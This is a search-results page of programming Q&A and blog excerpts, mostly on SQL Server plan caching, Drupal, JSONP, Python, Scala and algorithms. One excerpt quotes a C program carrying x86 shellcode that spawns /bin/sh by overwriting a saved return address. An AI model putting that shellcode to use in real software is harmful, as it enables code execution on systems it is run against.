Search Results

Search found 11015 results on 441 pages for 'explain plan'.

Page 12/441 | < Previous Page | 8 9 10 11 12 13 14 15 16 17 18 19  | Next Page >

  • General High-Level Assessment

    - by tcarper
    Guys and Gals, I've been tasked with a doozy of an assignment. The objective is something akin to "laying of hands" on several database servers which work in concert to provide data to various Web, Client-Server and Tablet-Sync'd distributed Client-Server programs. More specifically, I've been asked to come up with a "Maintenance Plan" which includes recommendations for future work to improve these machines' performance/reliability/security/etc. Might there be some good articles on teh interwebs ya'll could point me towards which would give me some good basis to start? Articles describing "These are the top 4 overarching categories and this is how you should proceed when drilling down on each of them" sort-of-thing would be fabulous. The Databases are all SQL 2005, however the compatibility level is 80 and they were originally created with ERwin based on SQL 6.5. The OSs are all Windows Server 2003. Thanks all! Tim

    Read the article

  • How can I explain object-oriented programming to someone who's only coded in Fortran 77? [closed]

    - by Zonedabone
    Possible Duplicate: How can I explain object-oriented programming to someone who’s only coded in Fortran 77? My mother did her college thesis in Fortran, and now (over a decade later) needs to learn c++ for fluids simulations. She is able to understand all of the procedural programming, but no matter how hard I try to explain objects to her, it doesn't stick. (I do a lot of work with Java, so I know how objects work) I think I might be explaining it in too high-level ways, so it isn't really making sense to someone who's never worked with them at all and grew up in the age of purely functional programming. Is there any simple way I can explain them to her that will help her understand? Thanks for the help in advance.

    Read the article

  • Plan Caching and Query Memory Part II (Hash Match) – When not to use stored procedure - Most common performance mistake SQL Server developers make.

    - by sqlworkshops
    SQL Server estimates Memory requirement at compile time, when stored procedure or other plan caching mechanisms like sp_executesql or prepared statement are used, the memory requirement is estimated based on first set of execution parameters. This is a common reason for spill over tempdb and hence poor performance. Common memory allocating queries are that perform Sort and do Hash Match operations like Hash Join or Hash Aggregation or Hash Union. This article covers Hash Match operations with examples. It is recommended to read Plan Caching and Query Memory Part I before this article which covers an introduction and Query memory for Sort. In most cases it is cheaper to pay for the compilation cost of dynamic queries than huge cost for spill over tempdb, unless memory requirement for a query does not change significantly based on predicates.   This article covers underestimation / overestimation of memory for Hash Match operation. Plan Caching and Query Memory Part I covers underestimation / overestimation for Sort. It is important to note that underestimation of memory for Sort and Hash Match operations lead to spill over tempdb and hence negatively impact performance. Overestimation of memory affects the memory needs of other concurrently executing queries. In addition, it is important to note, with Hash Match operations, overestimation of memory can actually lead to poor performance.   To read additional articles I wrote click here.   The best way to learn is to practice. To create the below tables and reproduce the behavior, join the mailing list by using this link: www.sqlworkshops.com/ml and I will send you the table creation script. Most of these concepts are also covered in our webcasts: www.sqlworkshops.com/webcasts  Let’s create a Customer’s State table that has 99% of customers in NY and the rest 1% in WA.Customers table used in Part I of this article is also used here.To observe Hash Warning, enable 'Hash Warning' in SQL Profiler under Events 'Errors and Warnings'. --Example provided by www.sqlworkshops.com drop table CustomersState go create table CustomersState (CustomerID int primary key, Address char(200), State char(2)) go insert into CustomersState (CustomerID, Address) select CustomerID, 'Address' from Customers update CustomersState set State = 'NY' where CustomerID % 100 != 1 update CustomersState set State = 'WA' where CustomerID % 100 = 1 go update statistics CustomersState with fullscan go   Let’s create a stored procedure that joins customers with CustomersState table with a predicate on State. --Example provided by www.sqlworkshops.com create proc CustomersByState @State char(2) as begin declare @CustomerID int select @CustomerID = e.CustomerID from Customers e inner join CustomersState es on (e.CustomerID = es.CustomerID) where es.State = @State option (maxdop 1) end go  Let’s execute the stored procedure first with parameter value ‘WA’ – which will select 1% of data. set statistics time on go --Example provided by www.sqlworkshops.com exec CustomersByState 'WA' goThe stored procedure took 294 ms to complete.  The stored procedure was granted 6704 KB based on 8000 rows being estimated.  The estimated number of rows, 8000 is similar to actual number of rows 8000 and hence the memory estimation should be ok.  There was no Hash Warning in SQL Profiler. To observe Hash Warning, enable 'Hash Warning' in SQL Profiler under Events 'Errors and Warnings'.   Now let’s execute the stored procedure with parameter value ‘NY’ – which will select 99% of data. -Example provided by www.sqlworkshops.com exec CustomersByState 'NY' go  The stored procedure took 2922 ms to complete.   The stored procedure was granted 6704 KB based on 8000 rows being estimated.    The estimated number of rows, 8000 is way different from the actual number of rows 792000 because the estimation is based on the first set of parameter value supplied to the stored procedure which is ‘WA’ in our case. This underestimation will lead to spill over tempdb, resulting in poor performance.   There was Hash Warning (Recursion) in SQL Profiler. To observe Hash Warning, enable 'Hash Warning' in SQL Profiler under Events 'Errors and Warnings'.   Let’s recompile the stored procedure and then let’s first execute the stored procedure with parameter value ‘NY’.  In a production instance it is not advisable to use sp_recompile instead one should use DBCC FREEPROCCACHE (plan_handle). This is due to locking issues involved with sp_recompile, refer to our webcasts, www.sqlworkshops.com/webcasts for further details.   exec sp_recompile CustomersByState go --Example provided by www.sqlworkshops.com exec CustomersByState 'NY' go  Now the stored procedure took only 1046 ms instead of 2922 ms.   The stored procedure was granted 146752 KB of memory. The estimated number of rows, 792000 is similar to actual number of rows of 792000. Better performance of this stored procedure execution is due to better estimation of memory and avoiding spill over tempdb.   There was no Hash Warning in SQL Profiler.   Now let’s execute the stored procedure with parameter value ‘WA’. --Example provided by www.sqlworkshops.com exec CustomersByState 'WA' go  The stored procedure took 351 ms to complete, higher than the previous execution time of 294 ms.    This stored procedure was granted more memory (146752 KB) than necessary (6704 KB) based on parameter value ‘NY’ for estimation (792000 rows) instead of parameter value ‘WA’ for estimation (8000 rows). This is because the estimation is based on the first set of parameter value supplied to the stored procedure which is ‘NY’ in this case. This overestimation leads to poor performance of this Hash Match operation, it might also affect the performance of other concurrently executing queries requiring memory and hence overestimation is not recommended.     The estimated number of rows, 792000 is much more than the actual number of rows of 8000.  Intermediate Summary: This issue can be avoided by not caching the plan for memory allocating queries. Other possibility is to use recompile hint or optimize for hint to allocate memory for predefined data range.Let’s recreate the stored procedure with recompile hint. --Example provided by www.sqlworkshops.com drop proc CustomersByState go create proc CustomersByState @State char(2) as begin declare @CustomerID int select @CustomerID = e.CustomerID from Customers e inner join CustomersState es on (e.CustomerID = es.CustomerID) where es.State = @State option (maxdop 1, recompile) end go  Let’s execute the stored procedure initially with parameter value ‘WA’ and then with parameter value ‘NY’. --Example provided by www.sqlworkshops.com exec CustomersByState 'WA' go exec CustomersByState 'NY' go  The stored procedure took 297 ms and 1102 ms in line with previous optimal execution times.   The stored procedure with parameter value ‘WA’ has good estimation like before.   Estimated number of rows of 8000 is similar to actual number of rows of 8000.   The stored procedure with parameter value ‘NY’ also has good estimation and memory grant like before because the stored procedure was recompiled with current set of parameter values.  Estimated number of rows of 792000 is similar to actual number of rows of 792000.    The compilation time and compilation CPU of 1 ms is not expensive in this case compared to the performance benefit.   There was no Hash Warning in SQL Profiler.   Let’s recreate the stored procedure with optimize for hint of ‘NY’. --Example provided by www.sqlworkshops.com drop proc CustomersByState go create proc CustomersByState @State char(2) as begin declare @CustomerID int select @CustomerID = e.CustomerID from Customers e inner join CustomersState es on (e.CustomerID = es.CustomerID) where es.State = @State option (maxdop 1, optimize for (@State = 'NY')) end go  Let’s execute the stored procedure initially with parameter value ‘WA’ and then with parameter value ‘NY’. --Example provided by www.sqlworkshops.com exec CustomersByState 'WA' go exec CustomersByState 'NY' go  The stored procedure took 353 ms with parameter value ‘WA’, this is much slower than the optimal execution time of 294 ms we observed previously. This is because of overestimation of memory. The stored procedure with parameter value ‘NY’ has optimal execution time like before.   The stored procedure with parameter value ‘WA’ has overestimation of rows because of optimize for hint value of ‘NY’.   Unlike before, more memory was estimated to this stored procedure based on optimize for hint value ‘NY’.    The stored procedure with parameter value ‘NY’ has good estimation because of optimize for hint value of ‘NY’. Estimated number of rows of 792000 is similar to actual number of rows of 792000.   Optimal amount memory was estimated to this stored procedure based on optimize for hint value ‘NY’.   There was no Hash Warning in SQL Profiler.   This article covers underestimation / overestimation of memory for Hash Match operation. Plan Caching and Query Memory Part I covers underestimation / overestimation for Sort. It is important to note that underestimation of memory for Sort and Hash Match operations lead to spill over tempdb and hence negatively impact performance. Overestimation of memory affects the memory needs of other concurrently executing queries. In addition, it is important to note, with Hash Match operations, overestimation of memory can actually lead to poor performance.   Summary: Cached plan might lead to underestimation or overestimation of memory because the memory is estimated based on first set of execution parameters. It is recommended not to cache the plan if the amount of memory required to execute the stored procedure has a wide range of possibilities. One can mitigate this by using recompile hint, but that will lead to compilation overhead. However, in most cases it might be ok to pay for compilation rather than spilling sort over tempdb which could be very expensive compared to compilation cost. The other possibility is to use optimize for hint, but in case one sorts more data than hinted by optimize for hint, this will still lead to spill. On the other side there is also the possibility of overestimation leading to unnecessary memory issues for other concurrently executing queries. In case of Hash Match operations, this overestimation of memory might lead to poor performance. When the values used in optimize for hint are archived from the database, the estimation will be wrong leading to worst performance, so one has to exercise caution before using optimize for hint, recompile hint is better in this case.   I explain these concepts with detailed examples in my webcasts (www.sqlworkshops.com/webcasts), I recommend you to watch them. The best way to learn is to practice. To create the above tables and reproduce the behavior, join the mailing list at www.sqlworkshops.com/ml and I will send you the relevant SQL Scripts.  Register for the upcoming 3 Day Level 400 Microsoft SQL Server 2008 and SQL Server 2005 Performance Monitoring & Tuning Hands-on Workshop in London, United Kingdom during March 15-17, 2011, click here to register / Microsoft UK TechNet.These are hands-on workshops with a maximum of 12 participants and not lectures. For consulting engagements click here.   Disclaimer and copyright information:This article refers to organizations and products that may be the trademarks or registered trademarks of their various owners. Copyright of this article belongs to R Meyyappan / www.sqlworkshops.com. You may freely use the ideas and concepts discussed in this article with acknowledgement (www.sqlworkshops.com), but you may not claim any of it as your own work. This article is for informational purposes only; you use any of the suggestions given here entirely at your own risk.   R Meyyappan [email protected] LinkedIn: http://at.linkedin.com/in/rmeyyappan

    Read the article

  • Explain difference in SQLIO numbers for RAID 0 versus RAID 5 over 6 disks

    - by markn
    When using the SQLIO benchmark tool on a 4-core Dell server with 6 15k 450GB (fast) drives, RAID 0, we found the max throughput was 2MB per second. But when configured as RAID 5, we get 30 MB per second. It seems that the RAID controller, Dell Perc 5i integrated controller, is maxing out the throughput per disk. With RAID 5, I expect to get a bump due to stripping, but not a 15x difference. Like good programmers, we suspect the hardware , but we could be missing something. This is predominately write traffic.

    Read the article

  • Please explain some of Paul Graham's points on LISP

    - by kunjaan
    I need some help understanding some of the points from Paul Graham's article http://www.paulgraham.com/diff.html A new concept of variables. In Lisp, all variables are effectively pointers. Values are what have types, not variables, and assigning or binding variables means copying pointers, not what they point to. A symbol type. Symbols differ from strings in that you can test equality by comparing a pointer. A notation for code using trees of symbols. The whole language always available. There is no real distinction between read-time, compile-time, and runtime. You can compile or run code while reading, read or run code while compiling, and read or compile code at runtime. What do these points mean How are they different in languages like C or Java? Do any other languages other than LISP family languages have any of these constructs now?

    Read the article

  • Please Explain Drupal schema and drupal_write_record

    - by Aaron
    Hi. A few questions. 1) Where is the best place to populate a new database table when a module is first installed, enabled? I need to go and get some data from an external source and want to do it transparently when the user installs/enables my custom module. I create the schema in {mymodule}_schema(), do drupal_install_schema({tablename}); in hook_install. Then I try to populate the table in hook_enable using drupal_write_record. I confirmed the table was created, I get no errors when hook_enable executes, but when I query the new table, I get no rows back--it's empty. Here's one variation of the code I've tried: /** * Implementation of hook_schema() */ function ncbi_subsites_schema() { // we know it's MYSQL, so no need to check $schema['ncbi_subsites_sites'] = array( 'description' => 'The base table for subsites', 'fields' => array( 'site_id' => array( 'description' => 'Primary id for site', 'type' => 'serial', 'unsigned' => TRUE, 'not null' => TRUE, ), // end site_id 'title' => array( 'description' => 'The title of the subsite', 'type' => 'varchar', 'length' => 255, 'not null' => TRUE, 'default' => '', ), //end title field 'url' => array( 'description' => 'The URL of the subsite in Production', 'type' => 'varchar', 'length' => 255, 'default' => '', ), //end url field ), //end fields 'unique keys' => array( 'site_id'=> array('site_id'), 'title' => array('title'), ), //end unique keys 'primary_key' => array('site_id'), ); // end schema return $schema; } Here's hook_install: function ncbi_subsites_install() { drupal_install_schema('ncbi_subsites'); } Here's hook_enable: function ncbi_subsites_enable() { drupal_get_schema('ncbi_subsites_site'); // my helper function to get data for table (not shown) $subsites = ncbi_subsites_get_subsites(); foreach( $subsites as $name=>$attrs ) { $record = new stdClass(); $record->title = $name; $record->url = $attrs['homepage']; drupal_write_record( 'ncbi_subsites_sites', $record ); } } Can someone tell me what I'm missing?

    Read the article

  • Explain BFS and DFS in terms of backtracking

    - by HH
    Wikipedia about DFS Depth-first search (DFS) is an algorithm for traversing or searching a tree, tree structure, or graph. One starts at the root (selecting some node as the root in the graph case) and explores as far as possible along each branch before backtracking. So is BFS? "an algorithm that choose a starting node, checks all nodes -- backtracks --, chooses the shortest path, chose neighbour nodes -- backtracks --, chose the shortest path -- finally finds the optimal path because of traversing each path due to continuos backtracking. Regex, find's pruning -- backtracking? The term backtracking confuseses due to its variety of use. UNIX find's pruning an SO-user explained with backtracking. Regex Buddy uses the term "catastrophic backtracking" if you do not limit the scope of your Regexes. It seems to be too wide umbrella-term. So: how do you define "Backtracking" GRAPH-theoretically? what is "backtracking" in BFS and DFS?

    Read the article

  • Can't explain why not redirecting after login using RedirectFromLogin

    - by Blankman
    I am using ASP.NET MVC, on my login action I am doing: [AcceptVerbs("POST")] public ActionResult Login(FormCollection form) { User validatedUser = // tests username/pwd here. FormsAuthentication.RedirectFromLoginPage( validatedUser.ID.ToString(), rememberMe); if(String.IsNullOrEmpty(Request["ReturnUrl"])) string redirectUrl = Request["ReturnUrl"]; if (!String.IsNullOrEmpty(Request.QueryString["ReturnUrl"])) string redirectUrl = Request["ReturnUrl"]; } My url looks like this when I am on the login page: http://localhost:56112/user/login?ReturnUrl=/admin/settings Does anything look wrong here? My web.config: <authentication mode="Forms"> <forms loginUrl="/user/login" protection="All" timeout="30" name="SomeCookie" requireSSL="false" slidingExpiration="true" defaultUrl="default.aspx" />

    Read the article

  • Explain Python extensions multithreading

    - by Checkers
    Python interpreter has a Global Interpreter Lock, and it is my understanding that extensions must acquire it in a multi-threaded environment. But Boost.Python HOWTO page says the extension function must release the GIL and reacquire it on exit. I want to resist temptation to guess here, so I would like to know what should be GIL locking patterns in the following scenarios: Extension is called from python (presumably running in a python thread). And extension's background thread calls back into Py_* functions. And a final question is, why the linked document says the GIL should be released and re-acquired?

    Read the article

  • please explain NHibernate HiLo

    - by Ben
    I'm struggling to get my head round how the HiLo generator works in NHibernate. I've read the explanation here which made things a little clearer. My understanding is that each SessionFactory retrieves the high value from the database. This improves performance because we have access to IDs without hitting the database. The explanation from the above link also states: For instance, supposing you have a "high" sequence with a current value of 35, and the "low" number is in the range 0-1023. Then the client can increment the sequence to 36 (for other clients to be able to generate keys while it's using 35) and know that keys 35/0, 35/1, 35/2, 35/3... 35/1023 are all available. How does this work in a web application as don't I only have one SessionFactory and therefore one hi value. Does this mean that in a disconnected application you can end up with duplicate (low) ids in your entity table? In my tests I used these settings: <id name="Id" unsaved-value="0"> <generator class="hilo"/> </id> I ran a test to save 100 objects. The IDs in my table went from 32768 - 32868. The next hi value was incremented to 2. Then I ran my test again and the Ids were in the range 65536 - 65636. First off, why start at 32768 and not 1, and secondly why the jump from 32868 to 65536? Now I know that my surrogate keys shouldn't have any meaning but we do use them in our application. Why can't I just have them increment nicely like a SQL Server identity field would. Finally can someone give me an explanation of how the max_lo parameter works? Is this the maximum number of low values (entity ids in my head) that can be created against the high value? This is one topic in NHibernate that I have struggled to find documentation for. I read the entire NHibernate in action book and it still doesn't go into how this works in any detail. Thanks Ben

    Read the article

  • Force creation of query execution plan

    - by Marc
    I have the following situation: .net 3.5 WinForm client app accessing SQL Server 2008 Some queries returning relatively big amount of data are used quite often by a form Users are using local SQL Express and restarting their machines at least daily Other users are working remotely over slow network connections The problem is that after a restart, the first time users open this form the queries are extremely slow and take more or less 15s on a fast machine to execute. Afterwards the same queries take only 3s. Of course this comes from the fact that no data is cached and must be loaded from disk first. My question: Would it be possible to force the loading of the required data in advance into SQL Server cache? Note My first idea was to execute the queries in a background worker when the application starts, so that when the user starts the form the queries will already be cached and execute fast directly. I however don't want to load the result of the queries over to the client as some users are working remotely or have otherwise slow networks. So I thought just executing the queries from a stored procedure and putting the results into temporary tables so that nothing would be returned. Turned out that some of the result sets are using dynamic columns so I couldn't create the corresponding temp tables and thus this isn't a solution. Do you happen to have any other idea?

    Read the article

  • Please explain JSONP

    - by Cheeso
    I don't understand jsonp. I understand JSON. I don't understand JSONP. Wikipedia is the top search result for JSONP. It says JSONP or "JSON with padding" is a JSON extension wherein a prefix is specified as an input argument of the call itself. Huh? What call? That doesn't make any sense to me. JSON is a data format. There's no call. The 2nd search result is from some guy named Remy, who writes JSONP is script tag injection, passing the response from the server in to a user specified function. I can sort of understand that, but it's still not making any sense. What is JSONP, why was it created (what problem does it solve), and why would I use it? Addendum: I've updated Wikipedia with a clearer and more thorough description of JSONP, based on jvenema's answer. Thanks, all.

    Read the article

  • Can somebody explain this Objective C method declaration syntax

    - by Doug R
    I'm working through an iPhone development book* without really knowing Objective C. For the most part I'm able to follow what's going on, but there are a few method declarations like the one below that I'm having a bit of trouble parsing. For example: - (NSInteger)tableView:(UITableView *)tableView numberOfRowsInSection:(NSInteger) section { return [self.controllers count]; //controllers is an instance variable of type NSArray in this class } It looks this is a method called numberOfRowsInSection, and it returns an NSInteger, and takes an NSInteger as a parameter which is locally called 'section'. But I don't understand all the references to tableView, or why this takes a parameter when it is not used within the method. Can somebody clarify this? Thanks. *p. 258, Beginning iPhone 3 Development, by Mark and LaMarche, published by Apress

    Read the article

  • Can somebody explain in a few sentences how these technologies relate: Flex, Flash, Air, ActionScrip

    - by SimpaCar
    I've read about each of these but I still don't understand how they all inter-operate, which are competing technologies, or even really what each of them is distinctly. Flash, Air, Flex... Are these all "containers"/JVM-like runtime environments, in which ActionScript code runs? SWF,FLV,AIR... Are these competing file formats which a Flash, Air or Flex runtime environment executes? ActionScript is a C-like language which compiles to SWF, FLV or AIR files? Sorry, with all the marketing around these terms, some of which are used interchangeably, I am quite lost. Suppose I wanted to write an AIR application... what would that entail? Writing ActionScript, compiling it to a SWF, and then installing the AIR runtime to execute it? How's that different than Flash? If I want to play AIR applications do I need a separate AIR runtime or does Flash execute AIR apps?

    Read the article

  • can anyone explain this code to me???

    - by Abed
    //shellcode.c char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main() { int *ret; //ret pointer for manipulating saved return. ret = (int *)&ret + 2; //setret to point to the saved return //value on the stack. (*ret) = (int)shellcode; //change the saved return value to the //address of the shellcode, so it executes. } can anyone give me a better explanation

    Read the article

  • IoC / Dependency Injection - please explain code versus XML

    - by steve.macdonald
    I understand basically how IoC frameworks work, however one thing I don't quite get is how code-based config is supposed to work. With XML I understand how you could add a new assembly to a deployed application, then change the config in XML to include it. If the application is already deployed (i.e., compiled in some form) then how can code changes be made without recompiling? Or is that what people do, just change config in code and recompile?

    Read the article

  • Explain to me how the Method Profiler works in the DDMS, I get heap space error

    - by Pentium10
    I start the Method Profiler for a process, then leave it run for about 5-10 secs, then I stop it. I see a progress that a file is pulled from the sdcard, than I get this Exception [2010-05-23 18:45:42] Traceview: Exception in thread "main" java.lang.OutOfMemoryError: Java heap space [2010-05-23 18:45:42] Traceview: at java.util.Arrays.copyOf(Unknown Source) [2010-05-23 18:45:42] Traceview: at java.util.Arrays.copyOf(Unknown Source) [2010-05-23 18:45:42] Traceview: at java.util.ArrayList.toArray(Unknown Source) [2010-05-23 18:45:42] Traceview: at java.util.Collections.sort(Unknown Source) [2010-05-23 18:45:42] Traceview: at com.android.traceview.TimeLineView.setData(TimeLineView.java:370) [2010-05-23 18:45:42] Traceview: at com.android.traceview.TimeLineView.<init>(TimeLineView.java:316) [2010-05-23 18:45:42] Traceview: at com.android.traceview.MainWindow.createContents(MainWindow.java:95) [2010-05-23 18:45:42] Traceview: at org.eclipse.jface.window.Window.create(Window.java:431) [2010-05-23 18:45:42] Traceview: at org.eclipse.jface.window.Window.open(Window.java:790) [2010-05-23 18:45:42] Traceview: at com.android.traceview.MainWindow.run(MainWindow.java:60) [2010-05-23 18:45:42] Traceview: at com.android.traceview.MainWindow.main(MainWindow.java:224) What I am doing wrong?

    Read the article

  • Can someone here explain constructors and destructors in python - simple explanation required - new

    - by rgolwalkar
    i will try to see if it makes sense :- class Person: '''Represnts a person ''' population = 0 def __init__(self,name): //some statements and population += 1 def __del__(self): //some statements and population -= 1 def sayHi(self): '''grettings from person''' print 'Hi My name is %s' % self.name def howMany(self): '''Prints the current population''' if Person.population == 1: print 'i am the only one here' else: print 'There are still %d guyz left ' % Person.population rohan = Person('Rohan') rohan.sayHi() rohan.howMany() sanju = Person('Sanjivi') sanju.howMany() del rohan # am i doing this correctly --- ? i need to get an explanation for this del - destructor O/P:- Initializing person data ****************************************** Initializing Rohan ****************************************** Population now is: 1 Hi My name is Rohan i am the only one here Initializing person data ****************************************** Initializing Sanjivi ****************************************** Population now is: 2 In case Person dies: ****************************************** Sanjivi Bye Bye world there are still 1 people left i am the only one here In case Person dies: ****************************************** Rohan Bye Bye world i am the last person on earth Population now is: 0 If required i can paste the whole lesson as well --- learning from :- http://www.ibiblio.org/swaroopch/byteofpython/read/

    Read the article

  • Can someone explain me implicit parameters in Scala?

    - by Oscar Reyes
    And more specifically how does the BigInt works for convert int to BigInt? In the source code it reads: ... implicit def int2bigInt(i: Int): BigInt = apply(i) ... How is this code invoked? I can understand how this other sample: "Date literals" works. In. val christmas = 24 Dec 2010 Defined by: implicit def dateLiterals(date: Int) = new { import java.util.Date def Dec(year: Int) = new Date(year, 11, date) } When int get's passed the message Dec with an int as parameter, the system looks for another method that can handle the request, in this case Dec(year:Int) Q1. Am I right in my understanding of Date literals? Q2. How does it apply to BigInt? Thanks

    Read the article

  • can you explain this jquery method from jquery.js

    - by mrblah
    Trying to understand how jquery works under the covers, what's the difference between: jQuery.fn and jQuery.prototype jQuery = window.jQuery = window.$ = function( selector, context ) { // The jQuery object is actually just the init constructor 'enhanced' return new jQuery.fn.init( selector, context ); }, and then: jQuery.fn = jQuery.prototype = { init: function( selector, context ) {

    Read the article

  • Explain the Peak and Flag Algorithm

    - by Isaac Levin
    EDIT Just was pointed that the requirements state peaks cannot be ends of Arrays. So I ran across this site http://codility.com/ Which gives you programming problems and gives you certificates if you can solve them in 2 hours. The very first question is one I have seen before, typically called the Peaks and Flags question. If you are not familiar A non-empty zero-indexed array A consisting of N integers is given. A peak is an array element which is larger than its neighbours. More precisely, it is an index P such that 0 < P < N - 1 and A[P - 1] < A[P] A[P + 1] . For example, the following array A: A[0] = 1 A[1] = 5 A[2] = 3 A[3] = 4 A[4] = 3 A[5] = 4 A[6] = 1 A[7] = 2 A[8] = 3 A[9] = 4 A[10] = 6 A[11] = 2 has exactly four peaks: elements 1, 3, 5 and 10. You are going on a trip to a range of mountains whose relative heights are represented by array A. You have to choose how many flags you should take with you. The goal is to set the maximum number of flags on the peaks, according to certain rules. Flags can only be set on peaks. What's more, if you take K flags, then the distance between any two flags should be greater than or equal to K. The distance between indices P and Q is the absolute value |P - Q|. For example, given the mountain range represented by array A, above, with N = 12, if you take: two flags, you can set them on peaks 1 and 5; three flags, you can set them on peaks 1, 5 and 10; four flags, you can set only three flags, on peaks 1, 5 and 10. You can therefore set a maximum of three flags in this case. Write a function that, given a non-empty zero-indexed array A of N integers, returns the maximum number of flags that can be set on the peaks of the array. For example, given the array above the function should return 3, as explained above. Assume that: N is an integer within the range [1..100,000]; each element of array A is an integer within the range [0..1,000,000,000]. Complexity: expected worst-case time complexity is O(N); expected worst-case space complexity is O(N), beyond input storage (not counting the storage required for input arguments). Elements of input arrays can be modified. So this makes sense, but I failed it using this code public int GetFlags(int[] A) { List<int> peakList = new List<int>(); for (int i = 0; i <= A.Length - 1; i++) { if ((A[i] > A[i + 1] && A[i] > A[i - 1])) { peakList.Add(i); } } List<int> flagList = new List<int>(); int distance = peakList.Count; flagList.Add(peakList[0]); for (int i = 1, j = 0, max = peakList.Count; i < max; i++) { if (Math.Abs(Convert.ToDecimal(peakList[j]) - Convert.ToDecimal(peakList[i])) >= distance) { flagList.Add(peakList[i]); j = i; } } return flagList.Count; } EDIT int[] A = new int[] { 7, 10, 4, 5, 7, 4, 6, 1, 4, 3, 3, 7 }; The correct answer is 3, but my application says 2 This I do not get, since there are 4 peaks (indices 1,4,6,8) and from that, you should be able to place a flag at 2 of the peaks (1 and 6) Am I missing something here? Obviously my assumption is that the beginning or end of an Array can be a peak, is this not the case? If this needs to go in Stack Exchange Programmers, I will move it, but thought dialog here would be helpful. EDIT

    Read the article

  • Can anyone explain UriMatcher (Android SDK)?

    - by mobibob
    I have been tasked with designing my web services client code to use the utility class UriMatcher in the Android SDK. Unfortunately, the example in the Dev Guide does not relate to anything in my mind. I know I am missing some fundamental points to the functionality and possibly about Uri itself. If you can tie it to some web APIs that are accessible with HTTP POST request, that would be ideal.

    Read the article

< Previous Page | 8 9 10 11 12 13 14 15 16 17 18 19  | Next Page >